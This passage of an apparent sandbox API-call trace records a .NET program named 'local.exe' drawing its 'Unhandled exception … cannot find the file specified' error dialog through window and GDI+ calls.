hMenu=0x0, hInstance=0xf70000, lpParam=0x0) returned 0x201f6 [0057.670] SetWindowLongW (hWnd=0x201f6, nIndex=-4, dwNewLong=1942927561) returned 5354014 [0057.670] GetWindowLongW (hWnd=0x201f6, nIndex=-4) returned 1942927561 [0057.670] SetWindowLongW (hWnd=0x201f6, nIndex=-4, dwNewLong=5354054) returned 1942927561 [0057.670] GetWindowLongW (hWnd=0x201f6, nIndex=-4) returned 5354054 [0057.670] GetWindowLongW (hWnd=0x201f6, nIndex=-16) returned 1174405133 [0057.670] GetWindowLongW (hWnd=0x201f6, nIndex=-12) returned 0 [0057.670] SetWindowLongW (hWnd=0x201f6, nIndex=-12, dwNewLong=131574) returned 0 [0057.670] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x81, wParam=0x0, lParam=0x3ae180) returned 0x1 [0057.672] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x83, wParam=0x0, lParam=0x3ae16c) returned 0x0 [0057.672] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x1, wParam=0x0, lParam=0x3ae180) returned 0x0 [0057.672] GetClientRect (in: hWnd=0x201f6, lpRect=0x3adeac | out: lpRect=0x3adeac) returned 1 [0057.672] GetWindowRect (in: hWnd=0x201f6, lpRect=0x3adeac | out: lpRect=0x3adeac) returned 1 [0057.672] GetParent (hWnd=0x201f6) returned 0x201f8 [0057.672] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201f8, lpPoints=0x3adeac, cPoints=0x2 | out: lpPoints=0x3adeac) returned -1900552 [0057.672] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x5, wParam=0x0, lParam=0x170064) returned 0x0 [0057.672] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0057.672] GetClientRect (in: hWnd=0x201f6, lpRect=0x3adf04 | out: lpRect=0x3adf04) returned 1 [0057.672] GetWindowRect (in: hWnd=0x201f6, lpRect=0x3adf04 | out: lpRect=0x3adf04) returned 1 [0057.672] GetParent (hWnd=0x201f6) returned 0x201f8 [0057.672] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201f8, lpPoints=0x3adf04, cPoints=0x2 | out: lpPoints=0x3adf04) returned -1900552 [0057.673] SendMessageW (hWnd=0x201f6, Msg=0x2210, wParam=0x1f60001, lParam=0x201f6) returned 0x0 [0057.673] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x2210, wParam=0x1f60001, lParam=0x201f6) returned 0x0 [0057.673] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0057.673] GetParent (hWnd=0x201f6) returned 0x201f8 [0057.673] GdipCreateFromHWND (hwnd=0x201f6, graphics=0x3ae770) returned 0x0 [0057.682] GdipMeasureString (graphics=0x4e5fcf0, string="Unhandled exception has occurred in your application. If you click Continue, the application will ignore this error and attempt to continue. If you click Quit, the application will close immediately.\r\n\r\nThe system cannot find the file specified.", length=245, font=0x4eb2940, layoutRect=0x3ae738, stringFormat=0x0, boundingBox=0x3ae728, codepointsFitted=0x3ae724, linesFilled=0x3ae720) returned 0x0 [0057.700] GdipDeleteGraphics (graphics=0x4e5fcf0) returned 0x0 [0057.702] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0057.702] GetCursorPos (in: lpPoint=0x2452c90 | out: lpPoint=0x2452c90*(x=166, y=29)) returned 1 [0057.702] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x3ae518 | out: lpmi=0x3ae518) returned 1 [0057.702] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0xba010827 [0057.703] GetDeviceCaps (hdc=0xba010827, index=12) returned 32 [0057.703] GetDeviceCaps (hdc=0xba010827, index=14) returned 1 [0057.703] DeleteDC (hdc=0xba010827) returned 1 [0057.703] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x3ae56c | out: lpmi=0x3ae56c) returned 1 [0057.703] AdjustWindowRectEx (in: lpRect=0x3ae704, dwStyle=0x2c80000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x3ae704) returned 1 [0057.703] GetSystemMetrics (nIndex=59) returned 1460 [0057.703] GetSystemMetrics (nIndex=60) returned 920 [0057.703] GetSystemMetrics (nIndex=34) returned 132 [0057.703] GetSystemMetrics (nIndex=35) returned 38 [0057.703] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0057.703] GetCursorPos (in: lpPoint=0x2452f2c | out: lpPoint=0x2452f2c*(x=166, y=29)) returned 1 [0057.703] MonitorFromPoint (pt=0xa5, dwFlags=0x1d) returned 0x10001 [0057.703] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x3ae41c | out: lpmi=0x3ae41c) returned 1 [0057.704] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0xbb010827 [0057.704] GetDeviceCaps (hdc=0xbb010827, index=12) returned 32 [0057.704] GetDeviceCaps (hdc=0xbb010827, index=14) returned 1 [0057.704] DeleteDC (hdc=0xbb010827) returned 1 [0057.704] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x3ae470 | out: lpmi=0x3ae470) returned 1 [0057.704] AdjustWindowRectEx (in: lpRect=0x3ae604, dwStyle=0x2c80000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x3ae604) returned 1 [0057.705] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0057.705] AdjustWindowRectEx (in: lpRect=0x3ae6d0, dwStyle=0x56000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x3ae6d0) returned 1 [0057.715] LoadIconW (hInstance=0x0, lpIconName=0x7f01) returned 0x1002d [0057.732] GetIconInfo (in: hIcon=0x1002d, piconinfo=0x24532c4 | out: piconinfo=0x24532c4) returned 1 [0057.732] GetObjectW (in: h=0x8d050821, c=24, pv=0x24532e0 | out: pv=0x24532e0) returned 24 [0057.742] GdipCreateBitmapFromHBITMAP (hbm=0x8d050821, hpal=0x0, bitmap=0x3ae65c) returned 0x0 [0057.743] GdipGetImageWidth (image=0x4e4f360, width=0x3ae678) returned 0x0 [0057.743] GdipGetImageHeight (image=0x4e4f360, height=0x3ae674) returned 0x0 [0057.743] GdipGetImagePixelFormat (image=0x4e4f360, format=0x3ae66c) returned 0x0 [0057.743] GdipBitmapLockBits (bitmap=0x4e4f360, rect=0x3ae630, flags=0x1, format=0x22009, lockedBitmapData=0x24533b4) returned 0x0 [0057.759] GdipCreateBitmapFromScan0 (width=32, height=32, stride=0, format=0x26200a, scan0=0x0, bitmap=0x3ae66c) returned 0x0 [0057.759] GdipBitmapLockBits (bitmap=0x4efc400, rect=0x3ae630, flags=0x2, format=0x26200a, lockedBitmapData=0x24533ec) returned 0x0 [0057.768] RtlMoveMemory (in: Destination=0x4ef9ca0, Source=0x4efc378, Length=0x80 | out: Destination=0x4ef9ca0) [0057.768] RtlMoveMemory (in: Destination=0x4ef9d20, Source=0x4efc2f8, Length=0x80 | out: Destination=0x4ef9d20) [0057.768] RtlMoveMemory (in: Destination=0x4ef9da0, Source=0x4efc278, Length=0x80 | out: Destination=0x4ef9da0) [0057.768] RtlMoveMemory (in: Destination=0x4ef9e20, Source=0x4efc1f8, Length=0x80 | out: Destination=0x4ef9e20) [0057.768] RtlMoveMemory (in: Destination=0x4ef9ea0, Source=0x4efc178, Length=0x80 | out: Destination=0x4ef9ea0) [0057.768] RtlMoveMemory (in: Destination=0x4ef9f20, Source=0x4efc0f8, Length=0x80 | out: Destination=0x4ef9f20) [0057.768] RtlMoveMemory (in: Destination=0x4ef9fa0, Source=0x4efc078, Length=0x80 | out: Destination=0x4ef9fa0) [0057.768] RtlMoveMemory (in: Destination=0x4efa020, Source=0x4efbff8, Length=0x80 | out: Destination=0x4efa020) [0057.768] RtlMoveMemory (in: Destination=0x4efa0a0, Source=0x4efbf78, Length=0x80 | out: Destination=0x4efa0a0) [0057.768] RtlMoveMemory (in: Destination=0x4efa120, Source=0x4efbef8, Length=0x80 | out: Destination=0x4efa120) [0057.768] RtlMoveMemory (in: Destination=0x4efa1a0, Source=0x4efbe78, Length=0x80 | out: Destination=0x4efa1a0) [0057.768] RtlMoveMemory (in: Destination=0x4efa220, Source=0x4efbdf8, Length=0x80 | out: Destination=0x4efa220) [0057.768] RtlMoveMemory (in: Destination=0x4efa2a0, Source=0x4efbd78, Length=0x80 | out: Destination=0x4efa2a0) [0057.768] RtlMoveMemory (in: Destination=0x4efa320, Source=0x4efbcf8, Length=0x80 | out: Destination=0x4efa320) [0057.768] RtlMoveMemory (in: Destination=0x4efa3a0, Source=0x4efbc78, Length=0x80 | out: Destination=0x4efa3a0) [0057.768] RtlMoveMemory (in: Destination=0x4efa420, Source=0x4efbbf8, Length=0x80 | out: Destination=0x4efa420) [0057.768] RtlMoveMemory (in: Destination=0x4efa4a0, Source=0x4efbb78, Length=0x80 | out: Destination=0x4efa4a0) [0057.768] RtlMoveMemory (in: Destination=0x4efa520, Source=0x4efbaf8, Length=0x80 | out: Destination=0x4efa520) [0057.768] RtlMoveMemory (in: Destination=0x4efa5a0, Source=0x4efba78, Length=0x80 | out: Destination=0x4efa5a0) [0057.768] RtlMoveMemory (in: Destination=0x4efa620, Source=0x4efb9f8, Length=0x80 | out: Destination=0x4efa620) [0057.768] RtlMoveMemory (in: Destination=0x4efa6a0, Source=0x4efb978, Length=0x80 | out: Destination=0x4efa6a0) [0057.768] RtlMoveMemory (in: Destination=0x4efa720, Source=0x4efb8f8, Length=0x80 | out: Destination=0x4efa720) [0057.769] RtlMoveMemory (in: Destination=0x4efa7a0, Source=0x4efb878, Length=0x80 | out: Destination=0x4efa7a0) [0057.769] RtlMoveMemory (in: Destination=0x4efa820, Source=0x4efb7f8, Length=0x80 | out: Destination=0x4efa820) [0057.769] RtlMoveMemory (in: Destination=0x4efa8a0, Source=0x4efb778, Length=0x80 | out: Destination=0x4efa8a0) [0057.769] RtlMoveMemory (in: Destination=0x4efa920, Source=0x4efb6f8, Length=0x80 | out: Destination=0x4efa920) [0057.769] RtlMoveMemory (in: Destination=0x4efa9a0, Source=0x4efb678, Length=0x80 | out: Destination=0x4efa9a0) [0057.769] RtlMoveMemory (in: Destination=0x4efaa20, Source=0x4efb5f8, Length=0x80 | out: Destination=0x4efaa20) [0057.769] RtlMoveMemory (in: Destination=0x4efaaa0, Source=0x4efb578, Length=0x80 | out: Destination=0x4efaaa0) [0057.769] RtlMoveMemory (in: Destination=0x4efab20, Source=0x4efb4f8, Length=0x80 | out: Destination=0x4efab20) [0057.769] RtlMoveMemory (in: Destination=0x4efaba0, Source=0x4efb478, Length=0x80 | out: Destination=0x4efaba0) [0057.769] RtlMoveMemory (in: Destination=0x4efac20, Source=0x4efb3f8, Length=0x80 | out: Destination=0x4efac20) [0057.769] GdipBitmapUnlockBits (bitmap=0x4e4f360, lockedBitmapData=0x24533b4) returned 0x0 [0057.769] GdipBitmapUnlockBits (bitmap=0x4efc400, lockedBitmapData=0x24533ec) returned 0x0 [0057.777] GdipDisposeImage (image=0x4e4f360) returned 0x0 [0057.785] DeleteObject (ho=0x8d050821) returned 1 [0057.785] DeleteObject (ho=0xbc050827) returned 1 [0057.785] GetCurrentThreadId () returned 0x974 [0057.785] GetCurrentThreadId () returned 0x974 [0057.786] SetWindowPos (hWnd=0x201f6, hWndInsertAfter=0x0, X=64, Y=8, cx=354, cy=68, uFlags=0x14) returned 1 [0057.787] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x46, wParam=0x0, lParam=0x3ae64c) returned 0x0 [0057.787] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x83, wParam=0x1, lParam=0x3ae624) returned 0x0 [0057.788] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x47, wParam=0x0, lParam=0x3ae64c) returned 0x0 [0057.788] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x3, wParam=0x0, lParam=0x80040) returned 0x0 [0057.788] GetClientRect (in: hWnd=0x201f6, lpRect=0x3ade64 | out: lpRect=0x3ade64) returned 1 [0057.788] GetWindowRect (in: hWnd=0x201f6, lpRect=0x3ade64 | out: lpRect=0x3ade64) returned 1 [0057.788] GetParent (hWnd=0x201f6) returned 0x201f8 [0057.788] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201f8, lpPoints=0x3ade64, cPoints=0x2 | out: lpPoints=0x3ade64) returned -1900552 [0057.788] InvalidateRect (hWnd=0x201f6, lpRect=0x0, bErase=1) returned 1 [0057.788] GetWindowTextLengthW (hWnd=0x201f6) returned 0 [0057.788] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0057.788] GetSystemMetrics (nIndex=42) returned 0 [0057.788] GetWindowTextW (in: hWnd=0x201f6, lpString=0x3adcf4, nMaxCount=1 | out: lpString="") returned 0 [0057.788] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0xd, wParam=0x1, lParam=0x3adcf4) returned 0x0 [0057.789] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0x5, wParam=0x0, lParam=0x440162) returned 0x0 [0057.789] GetClientRect (in: hWnd=0x201f6, lpRect=0x3ae390 | out: lpRect=0x3ae390) returned 1 [0057.789] GetWindowRect (in: hWnd=0x201f6, lpRect=0x3ae390 | out: lpRect=0x3ae390) returned 1 [0057.789] GetParent (hWnd=0x201f6) returned 0x201f8 [0057.789] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x201f8, lpPoints=0x3ae390, cPoints=0x2 | out: lpPoints=0x3ae390) returned -1900552 [0057.789] GetWindowTextLengthW (hWnd=0x201f6) returned 0 [0057.789] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0057.789] GetSystemMetrics (nIndex=42) returned 0 [0057.789] GetWindowTextW (in: hWnd=0x201f6, lpString=0x3ae6a8, nMaxCount=1 | out: lpString="") returned 0 [0057.789] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0xd, wParam=0x1, lParam=0x3ae6a8) returned 0x0 [0057.789] GetWindowTextLengthW (hWnd=0x201f6) returned 0 [0057.789] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0057.789] GetSystemMetrics (nIndex=42) returned 0 [0057.789] GetWindowTextW (in: hWnd=0x201f6, lpString=0x3ae6a4, nMaxCount=1 | out: lpString="") returned 0 [0057.789] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0xd, wParam=0x1, lParam=0x3ae6a4) returned 0x0 [0057.789] SetWindowTextW (hWnd=0x201f6, lpString="Unhandled exception has occurred in your application. If you click Continue, the application will ignore this error and attempt to continue. If you click Quit, the application will close immediately.\r\n\r\nThe system cannot find the file specified.") returned 1 [0057.789] CallWindowProcW (lpPrevWndFunc=0x73ceb8c9, hWnd=0x201f6, Msg=0xc, wParam=0x0, lParam=0x242d0e4) returned 0x1 [0057.789] InvalidateRect (hWnd=0x201f6, lpRect=0x0, bErase=1) returned 1 [0057.790] GetCurrentThreadId () returned 0x974 [0057.790] GetWindowThreadProcessId (in: hWnd=0x201f6, lpdwProcessId=0x3ae730 | out: lpdwProcessId=0x3ae730) returned 0x974 [0057.799] GdipCreateBitmapFromStream (stream=0x640030, bitmap=0x3ae76c) returned 0x0 [0057.993] GdipImageForceValidation (image=0x4e4f360) returned 0x0 [0057.995] GdipGetImageRawFormat (image=0x4e4f360, format=0x3ae6f0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0058.013] GdipGetImageHeight (image=0x4e4f360, height=0x3ae750) returned 0x0 [0058.013] GdipGetImageWidth (image=0x4e4f360, width=0x3ae750) returned 0x0 [0058.013] GdipGetImageWidth (image=0x4e4f360, width=0x3ae73c) returned 0x0 [0058.013] GdipGetImageHeight (image=0x4e4f360, height=0x3ae73c) returned 0x0 [0058.014] GdipGetImageWidth (image=0x4e4f360, width=0x3ae72c) returned 0x0 [0058.014] GdipGetImageHeight (image=0x4e4f360, height=0x3ae72c) returned 0x0 [0058.014] GdipBitmapGetPixel (bitmap=0x4e4f360, x=0, y=15, color=0x3ae73c) returned 0x0 [0058.014] GdipGetImageRawFormat (image=0x4e4f360, format=0x3ae66c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0058.014] GdipGetImageWidth (image=0x4e4f360, width=0x3ae66c) returned 0x0 [0058.014] GdipGetImageHeight (image=0x4e4f360, height=0x3ae66c) returned 0x0 [0058.014] GdipCreateBitmapFromScan0 (width=16, height=16, stride=0, format=0x26200a, scan0=0x0, bitmap=0x3ae670) returned 0x0 [0058.014] GdipGetImagePixelFormat (image=0x4efaca8, format=0x3ae66c) returned 0x0 [0058.014] GdipGetImageGraphicsContext (image=0x4efaca8, graphics=0x3ae678) returned 0x0 [0058.015] GdipGraphicsClear (graphics=0x4efcae0, color=0xffffff) returned 0x0 [0058.016] GdipCreateImageAttributes (imageattr=0x3ae67c) returned 0x0 [0058.016] GdipSetImageAttributesColorKeys (imageattr=0x4efb2d0, type=0x0, enableFlag=1, colorLow=0xffc0c0c0, colorHigh=0xffc0c0c0) returned 0x0 [0058.017] GdipDrawImageRectRectI (graphics=0x4efcae0, image=0x4e4f360, dstx=0, dsty=0, dstwidth=16, dstheight=16, srcx=0, srcy=0, srcwidth=16, srcheight=16, srcUnit=0x2, imageAttributes=0x4efb2d0, callback=0x0, callbackData=0x0) returned 0x0 [0058.025] GdipDisposeImageAttributes (imageattr=0x4efb2d0) returned 0x0 [0058.025] GdipDeleteGraphics (graphics=0x4efcae0) returned 0x0 [0058.025] GdipDisposeImage (image=0x4e4f360) returned 0x0 [0058.026] GdipCreateBitmapFromStream (stream=0x640010, bitmap=0x3ae76c) returned 0x0 [0058.027] GdipImageForceValidation (image=0x4e4f360) returned 0x0 [0058.028] GdipGetImageRawFormat (image=0x4e4f360, format=0x3ae6f0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0058.028] GdipGetImageHeight (image=0x4e4f360, height=0x3ae750) returned 0x0 [0058.028] GdipGetImageWidth (image=0x4e4f360, width=0x3ae750) returned 0x0 [0058.028] GdipGetImageWidth (image=0x4e4f360, width=0x3ae73c) returned 0x0 [0058.028] GdipGetImageHeight (image=0x4e4f360, height=0x3ae73c) returned 0x0 [0058.028] GdipGetImageWidth (image=0x4e4f360, width=0x3ae72c) returned 0x0 [0058.028] GdipGetImageHeight (image=0x4e4f360, height=0x3ae72c) returned 0x0 [0058.028] GdipBitmapGetPixel (bitmap=0x4e4f360, x=0, y=15, color=0x3ae73c) returned 0x0 [0058.028] GdipGetImageRawFormat (image=0x4e4f360, format=0x3ae66c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0058.028] GdipGetImageWidth (image=0x4e4f360, width=0x3ae66c) returned 0x0 [0058.028] GdipGetImageHeight (image=0x4e4f360, height=0x3ae66c) returned 0x0 [0058.028] GdipCreateBitmapFromScan0 (width=16, height=16, stride=0, format=0x26200a, scan0=0x0, bitmap=0x3ae670) returned 0x0 [0058.028] GdipGetImagePixelFormat (image=0x4efcae0, format=0x3ae66c) returned 0x0 [0058.028] GdipGetImageGraphicsContext (image=0x4efcae0, graphics=0x3ae678) returned 0x0 [0058.028] GdipGraphicsClear (graphics=0x4efcf70, color=0xffffff) returned 0x0 [0058.029] GdipCreateImageAttributes (imageattr=0x3ae67c) returned 0x0 [0058.029] GdipSetImageAttributesColorKeys (imageattr=0x4efb2d0, type=0x0, enableFlag=1, colorLow=0xffc0c0c0, colorHigh=0xffc0c0c0) returned 0x0 [0058.029] GdipDrawImageRectRectI (graphics=0x4efcf70, image=0x4e4f360, dstx=0, dsty=0, dstwidth=16, dstheight=16, srcx=0, srcy=0, srcwidth=16, srcheight=16, srcUnit=0x2, imageAttributes=0x4efb2d0, callback=0x0, callbackData=0x0) returned 0x0 [0058.029] GdipDisposeImageAttributes (imageattr=0x4efb2d0) returned 0x0 [0058.029] GdipDeleteGraphics (graphics=0x4efcf70) returned 0x0 [0058.029] GdipDisposeImage (image=0x4e4f360) returned 0x0 [0058.029] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0058.029] AdjustWindowRectEx (in: lpRect=0x3ae6e8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x3ae6e8) returned 1 [0058.030] GetCurrentThreadId () returned 0x974 [0058.030] GetCurrentThreadId () returned 0x974 [0058.030] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0058.030] AdjustWindowRectEx (in: lpRect=0x3ae6e8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x3ae6e8) returned 1 [0058.030] GetCurrentThreadId () returned 0x974 [0058.030] GetCurrentThreadId () returned 0x974 [0058.030] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0058.030] AdjustWindowRectEx (in: lpRect=0x3ae6e8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x3ae6e8) returned 1 [0058.030] GetCurrentThreadId () returned 0x974 [0058.030] GetCurrentThreadId () returned 0x974 [0058.030] GetSystemMetrics (nIndex=5) returned 1 [0058.030] GetSystemMetrics (nIndex=6) returned 1 [0058.031] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0058.031] AdjustWindowRectEx (in: lpRect=0x3ae63c, dwStyle=0x56210044, bMenu=0, dwExStyle=0x200 | out: lpRect=0x3ae63c) returned 1 [0058.031] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0058.031] AdjustWindowRectEx (in: lpRect=0x3ae63c, dwStyle=0x56210044, bMenu=0, dwExStyle=0x200 | out: lpRect=0x3ae63c) returned 1 [0058.032] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0058.032] AdjustWindowRectEx (in: lpRect=0x3ae6bc, dwStyle=0x563008c4, bMenu=0, dwExStyle=0x200 | out: lpRect=0x3ae6bc) returned 1 [0058.032] GetCurrentThreadId () returned 0x974 [0058.032] GetCurrentThreadId () returned 0x974 [0058.040] GetProcessWindowStation () returned 0x5c [0058.041] GetCurrentActCtx (in: lphActCtx=0x3ae778 | out: lphActCtx=0x3ae778*=0x416cac) returned 1 [0058.041] GetProcessWindowStation () returned 0x5c [0058.041] OleInitialize (pvReserved=0x0) returned 0x0 [0058.041] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x3ae6f8 | out: lplpMessageFilter=0x3ae6f8*=0x0) returned 0x0 [0058.042] GetCurrentThreadId () returned 0x974 [0058.043] EnumThreadWindows (dwThreadId=0x974, lpfn=0x51b6c6, lParam=0x0) returned 1 [0058.043] IsWindowVisible (hWnd=0x301be) returned 0 [0058.043] IsWindowVisible (hWnd=0x301c4) returned 1 [0058.043] IsWindowEnabled (hWnd=0x301c4) returned 1 [0058.043] IsWindowVisible (hWnd=0x6011c) returned 0 [0058.043] IsWindowVisible (hWnd=0x4011e) returned 0 [0058.043] GetActiveWindow () returned 0x0 [0058.043] GetFocus () returned 0x0 [0058.043] IsWindow (hWnd=0x301c4) returned 1 [0058.044] EnableWindow (hWnd=0x301c4, bEnable=0) returned 0 [0058.044] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x1f, wParam=0x0, lParam=0x0) returned 0x0 [0058.044] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xa, wParam=0x0, lParam=0x0) returned 0x0 [0058.044] GetCurrentActCtx (in: lphActCtx=0x3ae668 | out: lphActCtx=0x3ae668*=0x416cac) returned 1 [0058.044] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0058.044] AdjustWindowRectEx (in: lpRect=0x3ae5cc, dwStyle=0x2c80000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x3ae5cc) returned 1 [0058.044] GetCursorPos (in: lpPoint=0x2454e88 | out: lpPoint=0x2454e88*(x=166, y=29)) returned 1 [0058.044] MonitorFromPoint (pt=0xa6, dwFlags=0x1d) returned 0x10001 [0058.044] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x3ae4a8 | out: lpmi=0x3ae4a8) returned 1 [0058.045] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0xbd010827 [0058.045] GetDeviceCaps (hdc=0xbd010827, index=12) returned 32 [0058.045] GetDeviceCaps (hdc=0xbd010827, index=14) returned 1 [0058.045] DeleteDC (hdc=0xbd010827) returned 1 [0058.045] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x3ae4fc | out: lpmi=0x3ae4fc) returned 1 [0058.045] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0058.045] CreateWindowExW (dwExStyle=0x50001, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName="Microsoft .NET Framework", dwStyle=0x2c80000, X=493, Y=348, nWidth=454, nHeight=163, hWndParent=0x0, hMenu=0x0, hInstance=0xf70000, lpParam=0x0) returned 0x201ca [0058.045] SetWindowLongW (hWnd=0x201ca, nIndex=-4, dwNewLong=1997940189) returned 5310438 [0058.046] GetWindowLongW (hWnd=0x201ca, nIndex=-4) returned 1997940189 [0058.046] SetWindowLongW (hWnd=0x201ca, nIndex=-4, dwNewLong=5355246) returned 1997940189 [0058.046] GetWindowLongW (hWnd=0x201ca, nIndex=-4) returned 5355246 [0058.046] GetWindowLongW (hWnd=0x201ca, nIndex=-16) returned 113770496 [0058.046] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x81, wParam=0x0, lParam=0x3ae0fc) returned 0x1 [0058.046] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x83, wParam=0x0, lParam=0x3ae0e8) returned 0x0 [0058.046] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x1, wParam=0x0, lParam=0x3ae0fc) returned 0x0 [0058.046] GetClientRect (in: hWnd=0x201ca, lpRect=0x3ade34 | out: lpRect=0x3ade34) returned 1 [0058.046] GetWindowRect (in: hWnd=0x201ca, lpRect=0x3ade34 | out: lpRect=0x3ade34) returned 1 [0058.047] SetWindowTextW (hWnd=0x201ca, lpString="Microsoft .NET Framework") returned 1 [0058.047] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xc, wParam=0x0, lParam=0x2452b64) returned 0x1 [0058.047] GetStartupInfoW (in: lpStartupInfo=0x24551c4 | out: lpStartupInfo=0x24551c4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0058.048] GetParent (hWnd=0x201ca) returned 0x0 [0058.048] SetWindowLongW (hWnd=0x201ca, nIndex=-8, dwNewLong=0) returned 0 [0058.048] SendMessageW (hWnd=0x201ca, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0058.048] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0058.048] SendMessageW (hWnd=0x201ca, Msg=0x80, wParam=0x1, lParam=0x0) returned 0x0 [0058.048] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x80, wParam=0x1, lParam=0x0) returned 0x0 [0058.050] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0058.050] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0058.050] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0058.051] GetSystemMenu (hWnd=0x201ca, bRevert=0) returned 0xd0171 [0058.052] GetWindowPlacement (in: hWnd=0x201ca, lpwndpl=0x3ae678 | out: lpwndpl=0x3ae678) returned 1 [0058.052] EnableMenuItem (hMenu=0xd0171, 